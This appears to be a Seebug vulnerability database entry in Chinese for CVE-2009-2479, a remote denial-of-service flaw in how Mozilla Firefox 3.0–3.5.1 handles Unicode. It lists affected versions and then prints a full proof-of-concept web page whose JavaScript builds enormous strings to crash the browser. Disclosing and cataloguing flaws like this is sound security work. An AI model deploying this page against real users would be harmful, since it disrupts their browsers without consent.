Lucene search
RootSSV:11848HistoryJul 21, 2009 - 12:00 a.m.
Mozilla Firefox Unicode数据远程拒绝服务漏洞
2009-07-2100:00:00
Root
www.seebug.org
13
0.062 Low
EPSS
Percentile
93.6%
Bugraq ID: 35707
CVE ID:CVE-2009-2479
CNCVE ID:CNCVE-20092479
Mozilla Firefox是一款开放源代码的WEB浏览器。
Mozilla Firefox处理unicode数据存在问题,远程攻击者可以利用漏洞使应用程序崩溃。
构建恶意WEB页,诱使用户打开可触发此漏洞。
Mozilla Firefox 3.5.1
Mozilla Firefox 3.5
Mozilla Firefox 3.0.11
Mozilla Firefox 3.0.10
Mozilla Firefox 3.0.9
Mozilla Firefox 3.0.8
Mozilla Firefox 3.0.7
Mozilla Firefox 3.0.6
Mozilla Firefox 3.0.5
Mozilla Firefox 3.0.4
Mozilla Firefox 3.0.3
Mozilla Firefox 3.0.2
Mozilla Firefox 3.0.1
Mozilla Firefox 3.0
目前没有解决方案提供:
http://www.mozilla.com/en-US/
<html>
<head>
<script language="JavaScript" type="Text/Javascript">
var str = unescape("%u4141%u4141");
var str2 = unescape("%u0000%u0000");
var finalstr2 = mul8(str2, 49000000);
var finalstr = mul8(str, 21000000);
document.write(finalstr2);
document.write(finalstr);
function mul8 (str, num) {
var i = Math.ceil(Math.log(num) / Math.LN2),
res = str;
do {
res += res;
} while (0 < --i);
return res.slice(0, str.length * num);
}
</script>
</head>
<body>
</body>
</html>
<html><body></body></html>
Related
ubuntucve
ubuntucve
CVE-2009-2479
2009-07-16 00:00:00
cve
cve
prion
prion
cvelist
cvelist
nvd
nvd
openvas
openvas
Mozilla Firefox Buffer Overflow Vulnerability (Jul 2009) - Windows
2009-07-18 00:00:00
Mozilla Firefox Buffer Overflow Vulnerability (Jul 2009) - Linux
2009-07-18 00:00:00
Mozilla Firefox Buffer Overflow Vulnerability - July09 (Windows)
2009-07-18 00:00:00
debiancve
debiancve
CVE-2009-2578
2009-07-22 18:30:00
fedora
fedora
[SECURITY] Fedora 11 Update: xulrunner-1.9.1.1-1.fc11
2009-07-22 22:03:48
[SECURITY] Fedora 11 Update: epiphany-extensions-2.26.1-4.fc11
2009-07-22 22:03:48
[SECURITY] Fedora 11 Update: kazehakase-0.5.6-11.svn3771_trunk.fc11.3
2009-07-22 22:03:48
nessus
nessus
gentoo
gentoo
Mozilla Products: Multiple vulnerabilities
2013-01-08 00:00:00